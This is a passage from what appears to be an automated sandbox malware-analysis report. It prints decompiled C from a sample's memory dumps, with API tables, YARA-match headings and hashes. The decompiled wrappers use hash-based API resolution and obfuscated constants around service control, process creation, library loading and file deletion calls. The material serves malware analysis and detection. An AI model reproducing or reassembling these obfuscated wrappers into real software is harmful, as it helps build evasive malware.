                                              				return _t29;
                                              			}








                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 004BF6D8
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 435069b96fb85c21a87f9b36a5e7988f3b872b627bc7d8c0ef1d899fcac31deb
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 7601E2B6901208BBEF05EF95DC0A8DF7F79EB05324F148188F90462250E6B65E21EBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E004BB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E004B602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E004C07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}








                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 004BB759
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: cf4a406bd5a692bdf229945ca30559f3441c0a5c98b44f5bc83ea2d61d74245b
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 22014BB694130CFBEF45DF94DD06E9E7BB5EF18704F108188FA09661A0D3B25E20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E004CAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E004B602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E004C07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}







                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 004CAAA8
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: a2c9c40a9dc46210f6a8edc4c3fe7d84c03889ee1dc71ba5db834bfa723db2ca
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: C9F069B590020CFFDF08EF94DD4A99EBFB4EB40304F10809CF805A6250D3B69B549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E004B5FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E004B602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E004C07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}







                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 004B6025
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 6fd2a556a2c432c8ffda35aac0df7a61606eff5571ddae2efb7a46724159af71
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: 5FF04FB4C11208FFDB48DFA0E94689EBFB8EB40300F20819CE409A7260E7755F159F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E007D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E007D602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E007E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}









                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 007D29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 05a39dbffed50c4ad3436cc3475ba6677c47cd339c850ea17099bbf4c9c57cfa
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 22018072A01108BFEB14DF95DC0A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E007DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E007D602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E007E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}












                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 007DC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: e271fa5943788af38613e5e792215571654a0b9338f458159ed70c70fc81b739
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 721122B290122DBBCB259F95DC498DFBEB9EF04714F108188B90962210D3B14A659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E007D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E007D602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E007E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}











                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 007D1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: a4949c34679bac6c417c22de348064d3942f6d8670dd20648a43a981c3ad584d
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 4E016DB6D0130CFFDF04DF94C94A9DEBBB1EF54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E007D4859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E007E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}







                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 007D48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: fdd75fa4691ae7a749586fd438cb06727d540914531ef995dca898e456c54a94
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 43F017B0A05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E007E4F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E007D602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E007E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 007E4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 5b86f35a09f264319beb6762bf4c441aad0045e5deee6ce89920e36f184c1ddb
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 92F037B081120CFFDF04DFA4D94689EBFBAEB44300F208199E804AB250D3715B509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E007E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E007D602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E007E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}








                                              0x007e981d

                                              APIs
                                              • CreateProcessW.KERNEL32(007D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,007D591A), ref: 007E9816
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 9ea2ad3f1c4d5d255f9486fe3e5e8c52e5f239e66027acbc33842f7c26eb52dc
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 4A11B372901188FFDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E007DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E007D602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E007E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNELBASE(007E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,007E0668,?,?,?,?), ref: 007DB5FD
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 486d38c6f467e6bfb2d845806682660bd5f0ae0a5036ec8581d71851b83aa9f1
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: D311B272801248FBDF16DF95DD0ACEE7F7AEF89314F148198FA1862120D3769A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E007E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E007D602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E007E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,007D87F2,0000CAAE,0000510C,AD82F196), ref: 007E989B
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: c1e27797e5cf90d1a85ac65f66eaed0a4cf710e30e670148903d3ac463563916
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 6F015A76801208FBDF04EFD5D84ACDFBF79EF85750F108199F918A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E007E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E007D602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E007E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}










                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 007E7C67
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: f046828c034c1c33b58e03669a024759dd855791b12fecd21356839417d68a3f
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 9E014BB190120CFFEB09DFA4C84E8DEBBB9EF44314F208199F405A7240EAB15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E007DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E007D602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E007E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}









                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 007DF6D8
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 8bef7e7254d1eb45bbc5d98bf45e8823c796f323d164a7d010b4ce4c40f13005
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 5901E5B6901208BFEF059F94DC0A8DF7F75EB09324F148188F90462250D6B65E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E007DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E007D602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
